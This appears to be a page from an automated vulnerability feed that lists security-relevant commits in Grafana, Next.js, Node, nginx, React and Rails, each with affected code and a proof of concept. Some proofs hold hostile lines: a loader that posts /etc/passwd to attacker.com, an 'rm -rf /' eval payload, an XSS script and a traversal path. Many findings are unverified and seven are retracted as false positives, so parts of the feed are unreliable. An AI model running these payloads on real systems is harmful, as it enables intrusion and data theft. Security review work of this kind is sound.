During a rolling upgrade, start a unified storage migration for dashboards while simultaneously having another Grafana instance write to the dashboard table. The race condition occurs when: 1) Migration process reads dashboard data from legacy tables, 2) Another instance modifies the same dashboard record, 3) Migration process writes to unified storage based on stale data, resulting in data loss or corruption of the dashboard modifications made in step 2.

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 19, 2026, 10:06 AM — grafana/grafana

Commit: d2b5d7a

Author: Georges Chaudy

The code had a fallback authentication mechanism that would allow any request to bypass authorization checks when the primary authenticator failed. The fallback would accept requests with only namespace validation, effectively allowing unauthorized access to resources.

🔍 View Affected Code & PoC

Affected Code

newCtx, err = f.fallback(ctx)
if newCtx != nil {
    newCtx = resource.WithFallback(newCtx)
}
f.metrics.requestsTotal.WithLabelValues("true", fmt.Sprintf("%t", err == nil)).Inc()
return newCtx, err

Proof of Concept

Send a gRPC request to the unified storage service with malformed or missing authentication headers that would cause the primary authenticator to fail. The fallback authenticator would then activate, and any subsequent resource access request with a valid namespace (e.g., namespace: "some-valid-namespace") would be granted access regardless of actual user permissions, bypassing RBAC controls entirely.

⚠️ MEDIUM UNVERIFIED Access Control Bypass

Feb 18, 2026, 10:25 PM — grafana/grafana

Commit: 1bf8245

Author: Mihai Turdean

The scope resolver cache was not invalidated when datasources were deleted, causing stale name-to-UID mappings. When a datasource was deleted and a new one created with the same name, the cached entry would resolve to the deleted datasource's UID, leading to incorrect authorization decisions. The patch fixes this by invalidating the cache entry for the datasource name scope during deletion.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no cache invalidation in deletion handlers
hs.Live.HandleDatasourceDelete(c.GetOrgID(), ds.UID)
return response.Success("Data source deleted")

Proof of Concept

1. Create datasource 'test-ds' with UID 'uid-123' (cache stores test-ds -> uid-123)
2. Delete datasource 'test-ds' (cache still has stale test-ds -> uid-123)
3. Create new datasource 'test-ds' with UID 'uid-456'
4. Access control checks for 'test-ds' resolve to deleted UID 'uid-123' instead of current 'uid-456', potentially allowing unauthorized access or denying legitimate access

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 18, 2026, 10:33 PM — grafana/grafana

Commit: ba0f62a

Author: beejeebus

The code exposed encrypted datasource secrets even when they were empty, potentially leaking secret metadata or encrypted empty values to unauthorized users. The patch fixes this by filtering out empty secrets before returning them in API responses.

🔍 View Affected Code & PoC

Affected Code

return q.converter.AsDataSource(ds)

Proof of Concept

GET /api/datasources/{uid} - An attacker with read access could retrieve a datasource configuration and see references to all configured secret fields (even empty ones) in the SecureJsonData map, potentially revealing what secret fields are configured and their encrypted empty values, which could aid in further attacks or reveal system configuration details.

⚠️ MEDIUM UNVERIFIED Denial of Service / Resource Exhaustion

Feb 18, 2026, 04:53 PM — vercel/next.js

Commit: c885d48

Author: Zack Tanner

The code had a missing size check for postponed request bodies in self-hosted setups, allowing attackers to send arbitrarily large payloads that would consume server memory and potentially crash the application. The patch ensures maxPostponedStateSize is consistently enforced across all code paths that buffer postponed bodies.

🔍 View Affected Code & PoC

Affected Code

const body: Array<Buffer> = []
for await (const chunk of req) {
  body.push(chunk)
}
const postponed = Buffer.concat(body).toString('utf8')

Proof of Concept

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
next-resume: 1
Content-Length: 1073741824

[1GB of 'A' characters]

This would cause the server to buffer the entire 1GB payload in memory without any size validation, leading to memory exhaustion and potential DoS.
CONFIRMED

⚠️ MEDIUM CONFIRMED Information Disclosure

Feb 18, 2026, 11:55 AM — grafana/grafana

Commit: a6a74c5

Author: Matheus Macabu

The audit logging configuration was exposing sensitive data source request and response bodies by default. This could lead to credentials, API keys, and sensitive query data being logged in plaintext audit files accessible to system administrators.

🔍 View Affected Code & PoC

Affected Code

log_datasource_query_request_body = true
log_datasource_query_response_body = true

Proof of Concept

1. Configure a data source with API key in headers (e.g., Prometheus with `Authorization: Bearer secret-token`)
2. Execute query: `up{job="mysql"}`
3. Check audit logs - they would contain: `"request_body":{"headers":{"Authorization":"Bearer secret-token"}}` and full response data including potentially sensitive metrics values
CONFIRMED

🔥 HIGH CONFIRMED Authorization Bypass

Feb 17, 2026, 03:51 PM — grafana/grafana

Commit: 0c82488

Author: Gabriel MABILLE

The rolebindings API was accessible to all authenticated users without proper authorization checks. This allowed any user to potentially view, modify, or create role bindings, leading to privilege escalation. The patch restricts access to only access policy identities.

🔍 View Affected Code & PoC

Affected Code

if a.GetResource() == "rolebindings" {
    return resourceAuthorizer.Authorize(ctx, a)
}

Proof of Concept

A regular user could make API calls to the rolebindings endpoint (e.g., GET /api/iam/rolebindings or POST /api/iam/rolebindings) with their normal user credentials to access or modify role bindings they shouldn't have access to, potentially escalating their privileges by binding themselves to administrative roles.

⚠️ MEDIUM UNVERIFIED HTTP Request Smuggling / Content Length Mismatch

Jan 30, 2026, 01:06 PM — nginx/nginx

Commit: ec714d5

Author: Sergey Kandaurov

The vulnerability allows attackers to cause a mismatch between the Content-Length header sent to SCGI backends and the actual request body size in unbuffered mode. This can lead to HTTP request smuggling or desynchronization between nginx and SCGI backends, potentially allowing request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

body = r->upstream->request_bufs;
while (body) {
    content_length_n += ngx_buf_size(body->buf);
    body = body->next;
}

Proof of Concept

Send a chunked POST request to nginx with SCGI backend in unbuffered mode:
`​`​`​
POST /scgi-endpoint HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 100

5
hello
0

`​`​`​
The recalculated body size (5 bytes) differs from original Content-Length (100 bytes), causing the SCGI backend to expect more data than nginx sends, leading to request desynchronization.
CONFIRMED

🔥 HIGH CONFIRMED Code Injection

Feb 16, 2026, 02:59 PM — nodejs/node

Commit: 4d867af

Author: Shelley Vohr

The code used eval() to parse configuration data, which allows arbitrary Python code execution if an attacker can control the node_builtin_shareable_builtins configuration value. The patch replaces eval() with json.loads() to safely parse JSON data.

🔍 View Affected Code & PoC

Affected Code

eval(config['node_builtin_shareable_builtins'])

Proof of Concept

An attacker could set node_builtin_shareable_builtins to '__import__("os").system("rm -rf /")' which would execute arbitrary shell commands when eval() processes it during the build configuration generation.
CONFIRMED

⚠️ MEDIUM CONFIRMED Authorization Bypass

Feb 16, 2026, 09:59 AM — grafana/grafana

Commit: bcc238c

Author: Misi

The endpoint allowed any authenticated user to access team member information without proper authorization checks. The patch adds a permission check requiring 'GetPermissions' verb on the Team resource before returning member data.

🔍 View Affected Code & PoC

Affected Code

// No authorization check before returning team members
result, err := s.client.Search(ctx, searchRequest)
if err != nil {
    responder.Error(err)
    return
}

Proof of Concept

An authenticated user without team permissions could call GET /api/teams/{team-id}/members to retrieve sensitive member information for any team they shouldn't have access to, potentially exposing user associations and team structure across the organization.

⚠️ MEDIUM UNVERIFIED Resource Deletion Bypass

Feb 16, 2026, 07:36 AM — grafana/grafana

Commit: 3f65188

Author: Daniele Stefano Ferru

The code allowed updating Repository resources to remove all finalizers, which would cause immediate deletion without proper cleanup when the resource is later deleted. This bypasses the intended cleanup workflow and could lead to orphaned resources or incomplete cleanup operations.

🔍 View Affected Code & PoC

Affected Code

if len(r.Finalizers) == 0 && a.GetOperation() == admission.Create {
    r.Finalizers = []string{
        RemoveOrphanResourcesFinalizer,
        CleanFinalizer,
    }
}

Proof of Concept

1. Create a Repository resource (finalizers are added automatically)
2. Update the Repository with an empty finalizers array: `kubectl patch repository myrepo --type='merge' -p='{"metadata":{"finalizers":[]}}'`
3. Delete the Repository: `kubectl delete repository myrepo`
4. The resource is immediately deleted without cleanup, bypassing the controller's cleanup logic and potentially leaving orphaned resources

⚠️ MEDIUM UNVERIFIED Authorization Bypass

Feb 16, 2026, 07:30 AM — grafana/grafana

Commit: 45f14bc

Author: Gonzalo Trigueros Manzanas

The files API endpoints were not enforcing quota limits, allowing authenticated users to bypass resource quotas and create unlimited files/dashboards. This could lead to resource exhaustion and denial of service. The patch adds quota checks before allowing POST/PUT operations on files.

🔍 View Affected Code & PoC

Affected Code

func (c *filesConnector) handleRequest(ctx context.Context, name string, r *http.Request, info rest.ConnectRequest) (http.Handler, error) {
	// Missing quota enforcement for write operations
	obj, err := c.handleMethodRequest(ctx, r, opts, isDir, dualReadWriter)
}

Proof of Concept

POST /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/test-repo/files/dashboard1.json with valid auth token and dashboard JSON payload. Repeat requests beyond the configured quota limit (e.g., if quota is 10 resources, make 15+ POST requests creating new files). Before the patch, all requests would succeed despite exceeding quota, potentially exhausting disk space or overwhelming the system.

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 13, 2026, 10:54 PM — rails/rails

Commit: 1a4305d

Author: Joshua Huber

The Deduplicable module incorrectly treated virtual (generated) columns and regular columns as identical when they had the same name and type, causing regular columns to be silently excluded from INSERT/UPDATE operations. This resulted in NULL values being stored instead of the intended data, leading to silent data corruption.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'name'
2. Create another table with a regular column named 'name' of same type
3. Access virtual column first to register it in deduplication cache
4. Attempt INSERT on regular table: MyModel.create!(name: 'test_data')
5. The 'name' field will be NULL in database instead of 'test_data' due to column deduplication treating regular column as virtual

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 14, 2026, 08:50 AM — rails/rails

Commit: 97cda8c

Author: Jean Boussier

The vulnerability allows silent data corruption where regular columns can be incorrectly deduplicated with virtual columns, causing INSERT and UPDATE statements to exclude legitimate columns and store NULL values instead of the intended data. This occurs when the deduplication registry encounters a virtual column first, then treats a regular column with the same name and type as identical.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'status'
2. Access the virtual column to register it in deduplication cache
3. Create another table with a regular column named 'status' 
4. Attempt to insert data: User.create!(status: 'active')
5. The status field will be NULL in database instead of 'active' because the regular column was deduplicated to the virtual column and excluded from the INSERT statement
BREAKING

💣 CRITICAL UNVERIFIED Code Injection

Feb 13, 2026, 06:45 PM — vercel/next.js

Commit: 740d55c

Author: Tobias Koppers

The feature allows arbitrary webpack loader execution through import attributes without proper validation or sandboxing. An attacker can specify malicious loader code that gets executed during the build process, potentially leading to remote code execution on the build server.

🔍 View Affected Code & PoC

Affected Code

import value from '../data.js' with { turbopackLoader: 'malicious-loader', turbopackLoaderOptions: '{"cmd":"rm -rf /"}' }

Proof of Concept

Create a malicious loader at node_modules/malicious-loader/index.js:
`​`​`​js
module.exports = function(source) {
  const { exec } = require('child_process');
  exec('curl -X POST -d "$(cat /etc/passwd)" http://attacker.com/exfil');
  return source;
}
`​`​`​
Then use: `import data from './file.txt' with { turbopackLoader: 'malicious-loader' }` to execute arbitrary commands during build time.

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 13, 2026, 06:25 PM — grafana/grafana

Commit: 74d146a

Author: Mihai Turdean

The MT IAM API server was using a no-op storage backend for RoleBindings, which silently dropped all write operations and returned empty results for reads. Additionally, the authorizer denied all access to rolebindings. This created an authorization bypass where RBAC role bindings were completely non-functional, potentially allowing unauthorized access or preventing proper access controls from being enforced.

🔍 View Affected Code & PoC

Affected Code

roleBindingsStorage: noopstorage.ProvideStorageBackend(), // TODO: add a proper storage backend
...
return authorizer.DecisionDeny, "access denied", nil

Proof of Concept

POST /apis/iam.grafana.app/v0alpha1/rolebindings with body: {"apiVersion":"iam.grafana.app/v0alpha1","kind":"RoleBinding","metadata":{"name":"admin-binding"},"subjects":[{"kind":"User","name":"attacker"}],"roleRef":{"kind":"Role","name":"admin"}} - This request would be silently dropped by noopstorage, never creating the intended role binding, while appearing to succeed to the caller.

⚠️ MEDIUM UNVERIFIED Use-After-Free / Socket Corruption

Feb 6, 2026, 04:29 PM — nodejs/node

Commit: 37ff1ea

Author: Martin Slota

A race condition in HTTP keep-alive socket reuse allowed responseKeepAlive() to be called twice, corrupting socket state and causing the agent to hand an already-assigned socket to multiple requests. This could cause requests to hang, timeout, or potentially leak data between requests sharing the same corrupted socket.

🔍 View Affected Code & PoC

Affected Code

if (req.shouldKeepAlive && req._ended)
  responseKeepAlive(req);

Proof of Concept

const http = require('http');
const agent = new http.Agent({ keepAlive: true, maxSockets: 1 });

// Send multiple POST requests with Expect: 100-continue header
// The server responds quickly while client delays req.end() slightly
// This triggers the race where responseOnEnd() and requestOnFinish() 
// both call responseKeepAlive(), corrupting the socket and causing
// subsequent requests to hang or timeout due to stripped listeners

for (let i = 0; i < 10; i++) {
  const req = http.request({
    method: 'POST',
    agent,
    headers: { 'Expect': '100-continue' }
  });
  setTimeout(() => req.end(), 0); // Delay to hit race window
}

💡 LOW UNVERIFIED Race Condition (TOCTOU)

Feb 13, 2026, 04:30 PM — nodejs/node

Commit: b92c9b5

Author: giulioAZ

A Time-of-Check Time-of-Use race condition in worker thread process.cwd() caching allowed workers to cache stale directory values. The counter was incremented before the directory change completed, creating a race window where workers could read the old directory but cache it with the new counter value.

🔍 View Affected Code & PoC

Affected Code

process.chdir = function(path) {
  AtomicsAdd(cwdCounter, 0, 1);
  originalChdir(path);
};

Proof of Concept

const { Worker } = require('worker_threads');
const worker = new Worker(`
  setInterval(() => {
    const cwd = process.cwd();
    console.log('Worker sees:', cwd);
  }, 1);
`, { eval: true });

// Rapidly change directories
setInterval(() => {
  process.chdir('..');
  process.chdir('./some-dir');
}, 10);

// Workers will intermittently report incorrect directory paths due to caching stale values with updated counter
CONFIRMED

🔥 HIGH CONFIRMED Privilege Escalation

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: e97fa5f

Author: Mariell Hoversholm

The vulnerability allows attackers to bypass time range restrictions on public dashboards when time selection is disabled. By manipulating request time parameters, attackers can access annotations outside the intended dashboard time range, potentially exposing sensitive data from unauthorized time periods.

🔍 View Affected Code & PoC

Affected Code

annoQuery := &annotations.ItemQuery{
	From:         reqDTO.From,
	To:           reqDTO.To,
	OrgID:        dash.OrgID,
	DashboardID:  dash.ID,

Proof of Concept

POST /api/public/dashboards/{uid}/annotations with body: {"from": 0, "to": 9999999999999} - This would bypass dashboard time restrictions and retrieve all annotations across the entire time range, even when time selection is disabled and should be restricted to the dashboard's configured time window.
CONFIRMED

⚠️ MEDIUM CONFIRMED XSS

Feb 11, 2026, 12:01 PM — grafana/grafana

Commit: 8dfa644

Author: Mariell Hoversholm

The code was vulnerable to Cross-Site Scripting (XSS) by directly rendering user-controlled data via dangerouslySetInnerHTML without sanitization. Malicious trace data could inject JavaScript that would execute in users' browsers. The patch fixes this by sanitizing HTML content with DOMPurify before rendering.

🔍 View Affected Code & PoC

Affected Code

const jsonTable = <div className={styles.jsonTable} dangerouslySetInnerHTML={markup} />;

where markup could contain:
__html: `<span style="white-space: pre-wrap;">${row.value}</span>`

Proof of Concept

A malicious trace with a KeyValuePair containing: {"key": "malicious", "value": "</span><script>alert('XSS');</script><span>", "type": "text"} would result in script execution when viewing the trace details in Grafana's TraceView component.
CONFIRMED

⚠️ MEDIUM CONFIRMED Header Injection

Feb 11, 2026, 12:36 AM — grafana/grafana

Commit: f073f64

Author: Jocelyn Collado-Kuri

The code forwards arbitrary HTTP headers from incoming requests to outgoing gRPC calls without proper validation or sanitization. An attacker can inject malicious headers that could be used to bypass security controls, manipulate downstream services, or perform request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

for key, value := range req.Headers {
    ctx = metadata.AppendToOutgoingContext(ctx, key, url.PathEscape(value))
}

Proof of Concept

Send a streaming request with malicious headers like 'Authorization: Bearer stolen-token' or 'X-Forwarded-For: 127.0.0.1' in the Headers map of backend.RunStreamRequest. These headers would be forwarded to the Tempo backend, potentially allowing privilege escalation or IP spoofing attacks against the downstream service.

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 5, 2026, 07:26 PM — vercel/next.js

Commit: 6aeef8e

Author: nextjs-bot

The code was directly accessing the `$typeof` property on potentially untrusted objects without proper validation, allowing attackers to exploit prototype pollution to inject malicious `$typeof` properties. The patch introduces a `readReactElementTypeof` function that uses `hasOwnProperty.call()` to safely check for the property's existence on the object itself rather than the prototype chain.

🔍 View Affected Code & PoC

Affected Code

if (value.$typeof === REACT_ELEMENT_TYPE) {
  var typeName = getComponentNameFromType(value.type) || "\u2026",
    key = value.key;
  value = value.props;

Proof of Concept

Object.prototype.$typeof = Symbol.for('react.element'); const maliciousObj = { type: 'script', props: { dangerouslySetInnerHTML: { __html: 'alert(1)' } } }; // This would bypass React element validation due to polluted prototype

⚠️ MEDIUM UNVERIFIED Integer Division by Zero / Panic-based DoS

Feb 6, 2026, 08:03 PM — vercel/next.js

Commit: 6dfcffe

Author: Niklas Mischkulnig

The code performed integer division without checking for division by zero, which could cause a panic and crash the application. The patch replaces direct division with checked_div() to handle zero divisors safely.

🔍 View Affected Code & PoC

Affected Code

if max_chunk_count_per_group != 0 {
    chunks_to_merge_size / max_chunk_count_per_group
} else {
    unreachable!();
}

Proof of Concept

Set max_chunk_count_per_group to 0 through configuration or input parameters. When make_production_chunks() is called with this configuration, the division chunks_to_merge_size / max_chunk_count_per_group will cause a panic, crashing the Turbopack bundler and causing a denial of service.

⚠️ MEDIUM UNVERIFIED Integer Overflow / Denial of Service

Feb 9, 2026, 10:38 PM — vercel/next.js

Commit: 9a2113c

Author: Luke Sandberg

The code incorrectly used max() instead of min() to clamp worker counts, causing all systems to be treated as having 64+ cores and potentially overflowing usize on systems with many actual cores. This could lead to memory exhaustion or application crashes.

🔍 View Affected Code & PoC

Affected Code

let num_workers = num_workers.max(64);
(num_workers * num_workers * 16).next_power_of_two()

Proof of Concept

On a system with a large number of cores (e.g., 10000), the calculation becomes: (10000 * 10000 * 16).next_power_of_two() = 1,600,000,000.next_power_of_two() = 2,147,483,648, which exceeds usize limits on 32-bit systems and causes massive memory allocation attempts leading to DoS.
CONFIRMED

⚠️ MEDIUM CONFIRMED Path Traversal

Feb 4, 2026, 03:12 AM — facebook/react

Commit: 3ce1316

Author: Joseph Savona

The code had improper path resolution that allowed attackers to access files outside the intended directory structure. The patch fixes relative path resolution by properly normalizing paths relative to PROJECT_ROOT instead of allowing arbitrary relative paths from the current working directory.

🔍 View Affected Code & PoC

Affected Code

const inputPath = path.isAbsolute(opts.path)
  ? opts.path
  : path.resolve(process.cwd(), opts.path);

Proof of Concept

yarn snap compile ../../../etc/passwd

⚠️ MEDIUM UNVERIFIED Denial of Service (Stack Overflow)

Feb 4, 2026, 06:43 PM — facebook/react

Commit: cf993fb

Author: Hendrik Liebau

The recursive traversal of async node chains in visitAsyncNode causes stack overflow when processing deep async sequences. Database libraries creating long linear chains of async operations can trigger this DoS condition. The patch converts recursive traversal to iterative to prevent stack exhaustion.

🔍 View Affected Code & PoC

Affected Code

function visitAsyncNode(...) {
  if (visited.has(node)) {
    return visited.get(node);
  }
  visited.set(node, null);
  const result = visitAsyncNodeImpl(request, task, node, visited, cutOff);

Proof of Concept

// Create a deep chain of async sequences (10000+ levels)
let current = null;
for (let i = 0; i < 10000; i++) {
  current = { previous: current, end: -1 };
}
// This deep chain will cause stack overflow in visitAsyncNode
// when React Flight processes the async node traversal

⚠️ MEDIUM UNVERIFIED Denial of Service

Feb 8, 2026, 07:14 PM — facebook/react

Commit: 2dd9b7c

Author: Jimmy Lai

The code incorrectly checked for debugChannel existence instead of debugChannelReadable, causing the server to signal debug info availability even with write-only channels. This could cause clients to block indefinitely waiting for debug data that never arrives, resulting in a denial of service condition.

🔍 View Affected Code & PoC

Affected Code

debugChannel !== undefined,

Proof of Concept

// Server-side: Pass a write-only debug channel (no readable side)
const { Writable } = require('stream');
const writeOnlyChannel = new Writable({ write() {} });
renderToPipeableStream(component, { debugChannel: writeOnlyChannel });
// Client will now block forever waiting for debug data that cannot be read
❌ Corrections & Retractions (7)

⚠️ MEDIUM FALSE POSITIVE Path Traversal

Commit: 193f6f1

Author: Costa Alexoglou

The script used relative paths without proper directory resolution, allowing an attacker to execute the script from a different working directory and cause certificates to be written to unintended locations. This could lead to certificate files being created in arbitrary directories or overwriting existing files.

🔍 View Affected Code & PoC

Affected Code

rm -rf data/grafana-aggregator
mkdir -p data/grafana-aggregator
openssl req -nodes -new -x509 -keyout data/grafana-aggregator/ca.key

Proof of Concept

cd /tmp && /path/to/grafana/hack/make-aggregator-pki.sh - This would create certificates in /tmp/data/grafana-aggregator/ instead of the intended repo location, potentially overwriting files or bypassing access controls in the /tmp directory.

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: aac8061

Author: Tania

The code was performing namespace validation for all provider types, but the static provider (which serves local configuration) should not enforce namespace restrictions. This created an authorization bypass where users could access feature flags from other organizations by using the static provider endpoint with mismatched namespaces.

🔍 View Affected Code & PoC

Affected Code

valid, ns := b.validateNamespace(r)
if !valid {
	http.Error(w, namespaceMismatchMsg, http.StatusUnauthorized)
	return
}

Proof of Concept

An attacker authenticated to org-1 could access feature flags intended for org-2 by making requests to the static provider endpoints (when providerType is not FeaturesServiceProviderType or OFREPProviderType) with org-2's namespace in the URL path, bypassing the namespace validation that should prevent cross-organization access.

⚠️ MEDIUM FALSE POSITIVE State Modification via Dry-Run Bypass

Commit: ccaf868

Author: Igor Suleymanov

The dual-writer storage system was not properly handling dry-run operations, allowing state modifications and side effects (like permission changes) to occur when they should only validate without making changes. This violates the dry-run contract where operations must be read-only.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no dry-run check in Create method
func (d *dualWriter) Create(ctx context.Context, in runtime.Object, createValidation rest.ValidateObjectFunc, options *metav1.CreateOptions) (runtime.Object, error) {
    // ... proceeds to modify both legacy and unified storage even during dry-run

Proof of Concept

POST /api/v1/folders
Content-Type: application/json
Dry-Run: All

{"metadata":{"name":"test-folder"},"spec":{"title":"Test Folder"}}

# Before patch: This would create actual folder and modify permissions despite dry-run flag
# After patch: This only validates without side effects

🔥 HIGH FALSE POSITIVE Authorization Bypass

Commit: eda64c6

Author: Costa Alexoglou

The code incorrectly assigned key functions for namespaced and cluster-scoped resources, causing namespaced resources to use cluster-scoped key functions and vice versa. This could allow unauthorized access to resources across namespace boundaries by manipulating resource keys.

🔍 View Affected Code & PoC

Affected Code

if isNamespaced {
    statusStore.Store.KeyFunc = grafanaregistry.NamespaceKeyFunc(gr)
    statusStore.Store.KeyRootFunc = grafanaregistry.KeyRootFunc(gr)
} else {
    statusStore.Store.KeyFunc = grafanaregistry.ClusterScopedKeyFunc(gr)

Proof of Concept

curl -X PATCH 'http://localhost:3000/apis/advisor.grafana.app/v0alpha1/namespaces/admin-namespace/checks/sensitive-check/status' -H 'Content-Type: application/json-patch+json' -u 'low-priv-user:password' -d '[{"op": "replace", "path": "/status", "value": {"compromised": true}}]' - This would allow a low-privileged user to modify status of resources in other namespaces due to incorrect key function assignment.

⚠️ MEDIUM FALSE POSITIVE Query Injection

Commit: 9be63b1

Author: Steve Simpson

The code added validation for alert label matchers to prevent query injection in LogQL queries. Before the patch, malicious label names or matcher types could be injected into the LogQL query string without proper validation, potentially allowing attackers to manipulate the query structure.

🔍 View Affected Code & PoC

Affected Code

logql += fmt.Sprintf(` | alert_labels_%s %s %q`, matcher.Label, matcher.Type, matcher.Value)

Proof of Concept

POST request with Labels: [{"Type": "| json | drop", "Label": "severity", "Value": "critical"}] or Labels: [{"Type": "=", "Label": "test\" = \"injected\"", "Value": "value"}] to inject arbitrary LogQL operators and manipulate the query structure

⚠️ MEDIUM FALSE POSITIVE Information Disclosure

Commit: 14ee584

Author: Tom Ratcliffe

The code previously only allowed admin users to see team folder owners, but the patch changes this to allow any user with 'teams:read' permission to see folder owners. This creates an information disclosure vulnerability where users with lower privileges can access team ownership information they shouldn't be able to see.

🔍 View Affected Code & PoC

Affected Code

const isAdmin = contextSrv.hasRole('Admin') || contextSrv.isGrafanaAdmin;
{isAdmin && config.featureToggles.teamFolders && folderDTO && 'ownerReferences' in folderDTO && (
  <FolderOwners ownerReferences={folderDTO.ownerReferences} />
)}

Proof of Concept

1. Create a user account without admin privileges but with 'teams:read' permission
2. Navigate to a team folder that has owner references
3. Before patch: Owner information is hidden
4. After patch: Owner information is now visible, disclosing team membership and folder ownership data that was previously restricted to admins only

⚠️ MEDIUM FALSE POSITIVE Race Condition / Optimistic Locking Bypass

Commit: 57b75b4

Author: Will Assis

The code had a race condition in optimistic locking implementation where concurrent operations could bypass resource version checks. The original implementation would rollback changes after transaction commit, creating a window where conflicting writes could succeed simultaneously. The patch fixes this by performing conflict detection during the transaction using proper WHERE clauses with resource version constraints.

🔍 View Affected Code & PoC

Affected Code

DELETE FROM resource
WHERE group = ? AND resource = ? AND namespace = ? AND name = ?;
-- Missing resource_version check in WHERE clause

Proof of Concept

1. Client A reads resource with RV=100
2. Client B reads same resource with RV=100
3. Client A updates resource (RV becomes 101)
4. Client B deletes resource using old RV=100
5. Both operations succeed due to missing RV constraint in DELETE/UPDATE queries, allowing Client B to delete a resource that was modified after they read it, violating optimistic concurrency control